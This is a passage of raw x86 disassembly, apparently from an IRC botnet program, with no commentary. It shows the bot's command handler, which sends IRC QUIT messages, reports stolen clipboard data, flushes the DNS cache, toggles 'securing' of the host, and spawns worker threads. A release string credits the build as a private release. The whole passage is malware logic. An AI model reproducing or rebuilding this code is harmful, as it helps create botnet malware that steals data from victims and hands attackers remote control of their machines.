mov eax, [ebp+arg_0]
cmp [eax], bl
jnz loc_41486A
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_414B28: ; CODE XREF: sub_40F6F1+5239�j
push offset unk_436A4C
jmp loc_414FAD
; ---------------------------------------------------------------------------
loc_414B32: ; CODE XREF: sub_40F6F1+19A1�j
; sub_40F6F1+19B8�j
push [ebp+var_8C]
lea eax, [ebp+var_A4]
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_4]
push offset unk_435510
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_2DC]
push 200h
push eax
mov [ebp+var_A8], edi
call sub_41792A
push ebx
lea eax, [ebp+var_2DC]
push 1Eh
push eax
call sub_416E58
add esp, 24h
mov [ebp+var_24], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A8]
push ebx
push eax
push offset sub_408FAC
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_24]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414BC5
loc_414BB2: ; CODE XREF: sub_40F6F1+54D2�j
cmp [ebp+var_18], ebx
jnz loc_4157D0
push 32h
nop
call near ptr 7C802442h
jmp short loc_414BB2
; ---------------------------------------------------------------------------
loc_414BC5: ; CODE XREF: sub_40F6F1+54BF�j
nop
call near ptr 7C910331h
push eax
push offset unk_4354C4
jmp loc_4157C1
; ---------------------------------------------------------------------------
loc_414BD6: ; CODE XREF: sub_40F6F1+1973�j
; sub_40F6F1+198A�j
push 4
call sub_4170A0
test eax, eax
pop ecx
jle short loc_414BFA
lea eax, [ebp+var_2DC]
push offset unk_435498
push eax
call sub_4173AC
pop ecx
pop ecx
jmp loc_4158C0
; ---------------------------------------------------------------------------
loc_414BFA: ; CODE XREF: sub_40F6F1+54EF�j
mov eax, [ebp+esi+var_90]
cmp eax, ebx
jz short loc_414C1C
push eax
lea eax, [ebp+var_7FC]
push 104h
push eax
call sub_41792A
add esp, 0Ch
jmp short loc_414C2F
; ---------------------------------------------------------------------------
loc_414C1C: ; CODE XREF: sub_40F6F1+5512�j
lea eax, [ebp+var_7FC]
push 104h
push eax
push ebx
nop
call near ptr 7C80B4CFh
loc_414C2F: ; CODE XREF: sub_40F6F1+5529�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_414C3F
mov esi, offset byte_42EDC4
loc_414C3F: ; CODE XREF: sub_40F6F1+5547�j
push esi
lea eax, [ebp+var_6F8]
push 104h
push eax
call sub_41792A
mov eax, dword_42ECE4
push 7Fh
push [ebp+var_8C]
mov [ebp+var_5EC], eax
lea eax, [ebp+var_5E8]
mov [ebp+var_5F0], ebx
push eax
mov [ebp+var_800], edi
call sub_4182F0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_7FC]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_5EC]
push offset unk_4292AC
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 4
push eax
call sub_416E58
add esp, 38h
mov [ebp+var_5F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_800]
push ebx
push eax
push offset sub_406B85
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_5F4]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414D10
loc_414CFA: ; CODE XREF: sub_40F6F1+561D�j
cmp [ebp+var_560], ebx
jnz loc_4158C0
push 32h
nop
call near ptr 7C802442h
jmp short loc_414CFA
; ---------------------------------------------------------------------------
loc_414D10: ; CODE XREF: sub_40F6F1+5607�j
nop
call near ptr 7C910331h
push eax
push offset unk_435450
jmp loc_4158B1
; ---------------------------------------------------------------------------
loc_414D21: ; CODE XREF: sub_40F6F1+1945�j
; sub_40F6F1+195C�j
cmp [ebp+esi+var_90], ebx
jz short loc_414D4A
push [ebp+esi+var_90]
call sub_41791F
test eax, eax
pop ecx
jz short loc_414D4A
push [ebp+esi+var_90]
call sub_41791F
pop ecx
jmp short loc_414D4F
; ---------------------------------------------------------------------------
loc_414D4A: ; CODE XREF: sub_40F6F1+5637�j
; sub_40F6F1+5648�j
mov eax, dword_42ECE8
loc_414D4F: ; CODE XREF: sub_40F6F1+5657�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_57C], eax
xor eax, eax
cmp [ebp+var_9C4], bl
setz al
cmp esi, ebx
mov [ebp+var_568], eax
jz short loc_414D82
lea eax, [ebp+var_680]
push esi
push eax
call sub_4173AC
pop ecx
pop ecx
jmp short loc_414DAD
; ---------------------------------------------------------------------------
loc_414D82: ; CODE XREF: sub_40F6F1+567E�j
lea eax, [ebp+var_3FC]
push 104h
push eax
nop
call near ptr 7C814EEAh
push ebx
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
lea eax, [ebp+var_3FC]
push eax
call sub_418AA8
add esp, 14h
loc_414DAD: ; CODE XREF: sub_40F6F1+568F�j
lea eax, [ebp+var_680]
push eax
call sub_417AF0
cmp [ebp+eax+var_681], 5Ch
pop ecx
jnz short loc_414DD8
lea eax, [ebp+var_680]
push eax
call sub_417AF0
pop ecx
mov [ebp+eax+var_681], bl
loc_414DD8: ; CODE XREF: sub_40F6F1+56D1�j
push [ebp+var_8C]
lea eax, [ebp+var_908]
mov [ebp+var_90C], edi
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_8]
mov esi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_680]
mov [ebp+var_570], esi
push eax
push [ebp+var_57C]
push edi
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_429190
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 3
push eax
call sub_416E58
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_90C]
push ebx
push eax
push offset sub_405A6A
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414E89
loc_414E77: ; CODE XREF: sub_40F6F1+5796�j
cmp [ebp+var_560], ebx
jnz short loc_414EA4
push 32h
nop
call near ptr 7C802442h
jmp short loc_414E77
; ---------------------------------------------------------------------------
loc_414E89: ; CODE XREF: sub_40F6F1+5784�j
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_2DC]
push offset unk_435408
push eax
call sub_4173AC
add esp, 0Ch
loc_414EA4: ; CODE XREF: sub_40F6F1+578C�j
cmp [ebp+var_8], ebx
jnz loc_4157D0
push ebx
push esi
jmp loc_414FC8
; ---------------------------------------------------------------------------
loc_414EB4: ; CODE XREF: sub_40F6F1+1917�j
; sub_40F6F1+192E�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414EC7
push esi
call sub_41791F
jmp short loc_414ECE
; ---------------------------------------------------------------------------
loc_414EC7: ; CODE XREF: sub_40F6F1+57CC�j
push 8
call sub_4170BF
loc_414ECE: ; CODE XREF: sub_40F6F1+57D4�j
cmp eax, ebx
pop ecx
jz loc_415956
push eax
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_407146
loc_414EE7: ; CODE XREF: sub_40F6F1+5C86�j
add esp, 10h
jmp loc_415956
; ---------------------------------------------------------------------------
loc_414EEF: ; CODE XREF: sub_40F6F1+18E9�j
; sub_40F6F1+1900�j
mov eax, dword_4412E0
cmp eax, ebx
jz short loc_414F0C
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_414F05
push offset unk_4353D4
jmp short loc_414F21
; ---------------------------------------------------------------------------
loc_414F05: ; CODE XREF: sub_40F6F1+580B�j
push offset unk_435398
jmp short loc_414F21
; ---------------------------------------------------------------------------
loc_414F0C: ; CODE XREF: sub_40F6F1+5805�j
push offset unk_43535C
jmp short loc_414F21
; ---------------------------------------------------------------------------
loc_414F13: ; CODE XREF: sub_40F6F1+18BB�j
; sub_40F6F1+18D2�j
call sub_40AECD
test eax, eax
jz short loc_414F37
push offset unk_435328
loc_414F21: ; CODE XREF: sub_40F6F1+5812�j
; sub_40F6F1+5819�j ...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
jmp loc_4157F7
; ---------------------------------------------------------------------------
loc_414F37: ; CODE XREF: sub_40F6F1+5829�j
push offset unk_4352EC
jmp short loc_414F21
; ---------------------------------------------------------------------------
loc_414F3E: ; CODE XREF: sub_40F6F1+188D�j
; sub_40F6F1+18A4�j
cmp [ebp+var_8], ebx
jnz short loc_414F5B
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 14h
loc_414F5B: ; CODE XREF: sub_40F6F1+5850�j
push ebx
push [ebp+var_4]
call sub_40AA34
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
push offset dword_4352AC
jmp loc_415250
; ---------------------------------------------------------------------------
loc_414F7B: ; CODE XREF: sub_40F6F1+179C�j
; sub_40F6F1+17B3�j
push 7
call sub_4170A0
test eax, eax
pop ecx
jle short loc_414F8E
push offset dword_435274
jmp short loc_414FAD
; ---------------------------------------------------------------------------
loc_414F8E: ; CODE XREF: sub_40F6F1+5894�j
push [ebp+var_8C]
push edi
call sub_40BA41
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_414FA8
push offset dword_43523C
jmp short loc_414FAD
; ---------------------------------------------------------------------------
loc_414FA8: ; CODE XREF: sub_40F6F1+58AE�j
push offset dword_43520C
loc_414FAD: ; CODE XREF: sub_40F6F1+543C�j
; sub_40F6F1+589B�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_414FBB: ; CODE XREF: sub_40F6F1+1619�j
; sub_40F6F1+1644�j
cmp [ebp+var_8], ebx
jnz loc_4157D0
push ebx
push [ebp+var_4]
loc_414FC8: ; CODE XREF: sub_40F6F1+57BE�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push edi
loc_414FD6: ; CODE XREF: sub_40F6F1+2B93�j
; sub_40F6F1+30FD�j
call sub_40DC10
add esp, 14h
jmp loc_4157D0
; ---------------------------------------------------------------------------
loc_414FE3: ; CODE XREF: sub_40F6F1+176E�j
; sub_40F6F1+1785�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_40A421
jmp loc_40FAB5
; ---------------------------------------------------------------------------
loc_414FFA: ; CODE XREF: sub_40F6F1+1740�j
; sub_40F6F1+1757�j
push [ebp+esi+var_90]
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_40D8B7
jmp loc_40FAB5
; ---------------------------------------------------------------------------
loc_415015: ; CODE XREF: sub_40F6F1+1712�j
; sub_40F6F1+1729�j
or [ebp+arg_4], 0FFFFFFFFh
nop
call near ptr 7C80929Ch
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_415040
push esi
call sub_41791F
pop ecx
mov [ebp+arg_4], eax
loc_415040: ; CODE XREF: sub_40F6F1+5943�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, [ebp+arg_4]
jnb short loc_41505B
cmp [ebp+arg_4], 0FFFFFFFFh
jnz loc_415956
loc_41505B: ; CODE XREF: sub_40F6F1+595E�j
push ebx
call sub_40BBF6
push eax
lea eax, [ebp+var_2DC]
push offset dword_4351E4
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
jmp loc_415953
; ---------------------------------------------------------------------------
loc_41509B: ; CODE XREF: sub_40F6F1+16E4�j
; sub_40F6F1+16FB�j
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_408B8D
lea eax, [ebp+var_2DC]
push offset unk_4351B4
push eax
call sub_4173AC
add esp, 14h
jmp loc_4158C0
; ---------------------------------------------------------------------------
loc_4150C3: ; CODE XREF: sub_40F6F1+16B6�j
; sub_40F6F1+16CD�j
push 1Fh
call sub_4170A0
test eax, eax
pop ecx
jle short loc_4150ED
cmp [ebp+var_8], ebx
jnz loc_40FAB8
push ebx
push [ebp+var_4]
push offset unk_435180
push [ebp+var_8C]
push edi
jmp loc_410019
; ---------------------------------------------------------------------------
loc_4150ED: ; CODE XREF: sub_40F6F1+59DC�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_4F4], edi
mov [ebp+var_464], eax
mov [ebp+var_46C], ebx
jz short loc_41514B
push esi
push offset aFull ; "full"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41514B
mov [ebp+var_46C], 1
loc_41514B: ; CODE XREF: sub_40F6F1+5A3D�j
; sub_40F6F1+5A4E�j
lea eax, [ebp+var_2DC]
push offset dword_435148
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 1Fh
push eax
call sub_416E58
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_415DC2
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4151B9
loc_4151A3: ; CODE XREF: sub_40F6F1+5AC6�j
cmp [ebp+var_460], ebx
jnz loc_4157D0
push 32h
nop
call near ptr 7C802442h
jmp short loc_4151A3
; ---------------------------------------------------------------------------
loc_4151B9: ; CODE XREF: sub_40F6F1+5AB0�j
nop
call near ptr 7C910331h
push eax
push offset unk_4350F8
jmp loc_4157C1
; ---------------------------------------------------------------------------
loc_4151CA: ; CODE XREF: sub_40F6F1+1688�j
; sub_40F6F1+169F�j
cmp [ebp+var_8], ebx
jnz short loc_4151E7
push ebx
push [ebp+var_4]
push offset dword_4350D0
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 14h
loc_4151E7: ; CODE XREF: sub_40F6F1+5ADC�j
push edi
call dword_441450 ; closesocket
call dword_441318 ; WSACleanup
call sub_40ABB7
push ebx
nop
call near ptr 7C81CDDAh
loc_415200: ; CODE XREF: sub_40F6F1+165A�j
; sub_40F6F1+1671�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push edi
push eax
call sub_40BDAD
pop ecx
pop ecx
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
push offset dword_4350A8
jmp short loc_415250
; ---------------------------------------------------------------------------
loc_415227: ; CODE XREF: sub_40F6F1+1509�j
; sub_40F6F1+1520�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push edi
push [ebp+arg_1C]
push eax
call sub_40C061
add esp, 0Ch
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
push offset dword_435080
loc_415250: ; CODE XREF: sub_40F6F1+5885�j
; sub_40F6F1+5B34�j
call sub_40C4F7
jmp loc_4139FA
; ---------------------------------------------------------------------------
loc_41525A: ; CODE XREF: sub_40F6F1+14DB�j
; sub_40F6F1+14F2�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_40C597
jmp loc_40FAB5
; ---------------------------------------------------------------------------
loc_415271: ; CODE XREF: sub_40F6F1+14AD�j
; sub_40F6F1+14C4�j
cmp [ebp+var_C], ebx
mov [ebp+var_388], bl
jz short loc_4152B0
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_4152B0
push esi
push [ebp+var_C]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4152B0
push eax
push offset dword_42433C
lea eax, [ebp+var_388]
push 80h
push eax
call sub_41792A
add esp, 10h
loc_4152B0: ; CODE XREF: sub_40F6F1+5B89�j
; sub_40F6F1+5B94�j ...
push [ebp+var_8C]
lea eax, [ebp+var_408]
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_4]
push offset dword_435058
mov [ebp+var_304], eax
mov eax, [ebp+var_8]
mov [ebp+var_300], eax
lea eax, [ebp+var_2DC]
push eax
mov [ebp+var_40C], edi
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 1Dh
push eax
call sub_416E58
add esp, 20h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_40C609
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_41534D
loc_415337: ; CODE XREF: sub_40F6F1+5C5A�j
cmp [ebp+var_2FC], ebx
jnz loc_40FAB8
push 32h
nop
call near ptr 7C802442h
jmp short loc_415337
; ---------------------------------------------------------------------------
loc_41534D: ; CODE XREF: sub_40F6F1+5C44�j
nop
call near ptr 7C910331h
push eax
push offset dword_435010
jmp loc_40FCA1
; ---------------------------------------------------------------------------
loc_41535E: ; CODE XREF: sub_40F6F1+147F�j
; sub_40F6F1+1496�j
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_40C47F
push offset dword_434FE8
call sub_40C4F7
jmp loc_414EE7
; ---------------------------------------------------------------------------
loc_41537C: ; CODE XREF: sub_40F6F1+1451�j
; sub_40F6F1+1468�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_4F4], edi
mov [ebp+var_464], eax
jz short loc_4153D3
push offset dword_434FE4
push esi
call sub_4177D0
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_46C], eax
jmp short loc_4153D9
; ---------------------------------------------------------------------------
loc_4153D3: ; CODE XREF: sub_40F6F1+5CC6�j
mov [ebp+var_46C], ebx
loc_4153D9: ; CODE XREF: sub_40F6F1+5CE0�j
lea eax, [ebp+var_2DC]
push offset dword_434FB8
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 20h
push eax
call sub_416E58
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset byte_416EC3
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_415443
loc_415431: ; CODE XREF: sub_40F6F1+5D50�j
cmp [ebp+var_460], ebx
jnz short loc_41545E
push 32h
nop
call near ptr 7C802442h
jmp short loc_415431
; ---------------------------------------------------------------------------
loc_415443: ; CODE XREF: sub_40F6F1+5D3E�j
nop
call near ptr 7C910331h
push eax
push offset dword_434F70
loc_41544F: ; CODE XREF: sub_40F6F1+4B2B�j
; sub_40F6F1+4C44�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
loc_41545E: ; CODE XREF: sub_40F6F1+461D�j
; sub_40F6F1+4635�j ...
lea eax, [ebp+var_2DC]
push eax
jmp loc_410F62
; ---------------------------------------------------------------------------
loc_41546A: ; CODE XREF: sub_40F6F1+13D1�j
; sub_40F6F1+13E8�j
push offset aArra ; "arra"
lea eax, [ebp+var_2DC]
push offset dword_434F48
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 20h
jmp loc_411A54
; ---------------------------------------------------------------------------
loc_41549F: ; CODE XREF: sub_40F6F1+13A3�j
; sub_40F6F1+13BA�j
push dword_5154C0
call sub_40BBF6
push eax
lea eax, [ebp+var_2DC]
push offset dword_434F0C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 24h
jmp loc_411A54
; ---------------------------------------------------------------------------
loc_4154DB: ; CODE XREF: sub_40F6F1+1375�j
; sub_40F6F1+138C�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_41550B
cmp [ebp+var_C], ebx
jz short loc_415518
push esi
push [ebp+var_C]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz short loc_415518
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push edi
call sub_40DBCA
add esp, 0Ch
jmp short loc_415518
; ---------------------------------------------------------------------------
loc_41550B: ; CODE XREF: sub_40F6F1+5DF3�j
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_40DBCA
pop ecx
pop ecx
loc_415518: ; CODE XREF: sub_40F6F1+5DF8�j
; sub_40F6F1+5E07�j ...
push 0FFFFFFFEh
jmp loc_40FABA
; ---------------------------------------------------------------------------
loc_41551F: ; CODE XREF: sub_40F6F1+1347�j
; sub_40F6F1+135E�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push edi
call sub_40DBCA
push offset dword_434EBC
call sub_40C4F7
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_41553F: ; CODE XREF: sub_40F6F1+1319�j
; sub_40F6F1+1330�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push edi
call sub_40DBCA
push offset dword_434E7C
call sub_40C4F7
add esp, 0Ch
xor eax, eax
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_41555E: ; CODE XREF: sub_40F6F1+12EB�j
; sub_40F6F1+1302�j
push [ebp+var_4]
push [ebp+var_8C]
push edi
call sub_40707C
jmp loc_413963
; ---------------------------------------------------------------------------
loc_415572: ; CODE XREF: sub_40F6F1+123C�j
; sub_40F6F1+1253�j
push [ebp+esi+var_90]
push 1Fh
push offset dword_434E6C
push offset dword_434E60
jmp loc_410782
; ---------------------------------------------------------------------------
loc_41558A: ; CODE XREF: sub_40F6F1+120E�j
; sub_40F6F1+1225�j
push [ebp+esi+var_90]
push 1Ch
push offset dword_434E54
push offset dword_434E44
jmp loc_410782
; ---------------------------------------------------------------------------
loc_4155A2: ; CODE XREF: sub_40F6F1+104E�j
; sub_40F6F1+1065�j
cmp [ebp+esi+var_90], ebx
jz short loc_4155CB
push [ebp+esi+var_90]
call sub_41791F
test eax, eax
pop ecx
jz short loc_4155CB
push [ebp+esi+var_90]
call sub_41791F
pop ecx
jmp short loc_4155D0
; ---------------------------------------------------------------------------
loc_4155CB: ; CODE XREF: sub_40F6F1+5EB8�j
; sub_40F6F1+5EC9�j
mov eax, dword_42ECE0
loc_4155D0: ; CODE XREF: sub_40F6F1+5ED8�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_478], eax
cmp esi, ebx
jz short loc_4155F5
push esi
loc_4155E2: ; CODE XREF: sub_40F6F1+5F13�j
lea eax, [ebp+var_488]
push 10h
push eax
call sub_41792A
add esp, 0Ch
jmp short loc_41560C
; ---------------------------------------------------------------------------
loc_4155F5: ; CODE XREF: sub_40F6F1+5EEE�j
cmp [ebp+var_9C7], bl
jz short loc_415606
lea eax, [ebp+var_D8]
push eax
jmp short loc_4155E2
; ---------------------------------------------------------------------------
loc_415606: ; CODE XREF: sub_40F6F1+5F0A�j
mov [ebp+var_488], bl
loc_41560C: ; CODE XREF: sub_40F6F1+5F02�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov [ebp+var_46C], eax
mov eax, [ebp+var_8]
mov [ebp+var_468], eax
lea eax, [ebp+var_508]
push 80h
push eax
mov [ebp+var_50C], edi
call sub_41792A
add esp, 0Ch
push [ebp+var_478]
push edi
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_4296E0
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 11h
push eax
call sub_416E58
add esp, 1Ch
mov [ebp+var_474], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_50C]
push ebx
push eax
push offset sub_407F51
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_474]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4156BA
loc_4156A4: ; CODE XREF: sub_40F6F1+5FC7�j
cmp [ebp+var_464], ebx
jnz loc_40FAB8
push 32h
nop
call near ptr 7C802442h
jmp short loc_4156A4
; ---------------------------------------------------------------------------
loc_4156BA: ; CODE XREF: sub_40F6F1+5FB1�j
nop
call near ptr 7C910331h
push eax
push offset unk_434DFC
jmp loc_40FCA1
; ---------------------------------------------------------------------------
loc_4156CB: ; CODE XREF: sub_40F6F1+FF2�j
; sub_40F6F1+1009�j ...
push [ebp+arg_8]
push offset aSecure ; "secure"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_4156F7
push [ebp+arg_8]
push offset aSec ; "sec"
call sub_4177D0
pop ecx
mov [ebp+var_46C], ebx
test eax, eax
pop ecx
jnz short loc_415701
loc_4156F7: ; CODE XREF: sub_40F6F1+5FEB�j
mov [ebp+var_46C], 1
loc_415701: ; CODE XREF: sub_40F6F1+6004�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_46C], ebx
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
mov [ebp+var_4F4], edi
mov [ebp+var_464], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_415745
mov eax, offset aUnsecuring ; "Unsecuring"
loc_415745: ; CODE XREF: sub_40F6F1+604D�j
push eax
push offset dword_434DB0
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
push ebx
lea eax, [ebp+var_2DC]
push 1Ah
push eax
call sub_416E58
add esp, 1Ch
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_416501
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4157B5
loc_4157A3: ; CODE XREF: sub_40F6F1+60C2�j
cmp [ebp+var_460], ebx
jnz short loc_4157D0
push 32h
nop
call near ptr 7C802442h
jmp short loc_4157A3
; ---------------------------------------------------------------------------
loc_4157B5: ; CODE XREF: sub_40F6F1+60B0�j
nop
call near ptr 7C910331h
push eax
push offset unk_434930
loc_4157C1: ; CODE XREF: sub_40F6F1+3E9D�j
; sub_40F6F1+4D40�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
loc_4157D0: ; CODE XREF: sub_40F6F1+2B79�j
; sub_40F6F1+30E5�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
jmp loc_40FCA7
; ---------------------------------------------------------------------------
loc_4157E1: ; CODE XREF: sub_40F6F1+FC4�j
; sub_40F6F1+FDB�j
push offset aNzmPrivRelease ; "NzM Priv Release by Ud2"
lea eax, [ebp+var_2DC]
push offset dword_434D90
push eax
call sub_4173AC
loc_4157F7: ; CODE XREF: sub_40F6F1+5841�j
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_411A54
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
jmp loc_411A4C
; ---------------------------------------------------------------------------
loc_41581A: ; CODE XREF: sub_40F6F1+F96�j
; sub_40F6F1+FAD�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_415871
push esi
call sub_41791F
cmp eax, ebx
pop ecx
jl short loc_415869
cmp eax, 2
jge short loc_415869
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_415861
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2DC]
push offset dword_4381C4
push eax
call sub_4173AC
add esp, 0Ch
mov [esi], bl
jmp short loc_4158C0
; ---------------------------------------------------------------------------
loc_415861: ; CODE XREF: sub_40F6F1+6152�j
push eax
push offset dword_434D54
jmp short loc_4158B1
; ---------------------------------------------------------------------------
loc_415869: ; CODE XREF: sub_40F6F1+613D�j
; sub_40F6F1+6142�j
push eax
push offset dword_434D18
jmp short loc_4158B1
; ---------------------------------------------------------------------------
loc_415871: ; CODE XREF: sub_40F6F1+6132�j
mov eax, [ebp+arg_18]
xor esi, esi
mov [ebp+arg_4], eax
loc_415879: ; CODE XREF: sub_40F6F1+61A7�j
push [ebp+var_94]
push [ebp+arg_4]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_41589C
add [ebp+arg_4], 80h
inc esi
cmp esi, 2
jl short loc_415879
jmp short loc_4158C0
; ---------------------------------------------------------------------------
loc_41589C: ; CODE XREF: sub_40F6F1+619A�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
push offset dword_4381C4
loc_4158B1: ; CODE XREF: sub_40F6F1+562B�j
; sub_40F6F1+6176�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
loc_4158C0: ; CODE XREF: sub_40F6F1+5504�j
; sub_40F6F1+560F�j ...
cmp [ebp+var_8], ebx
jnz loc_4100A4
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
loc_4158DB: ; CODE XREF: sub_40F6F1+1EFE�j
call sub_40DC10
add esp, 14h
jmp loc_4100A4
; ---------------------------------------------------------------------------
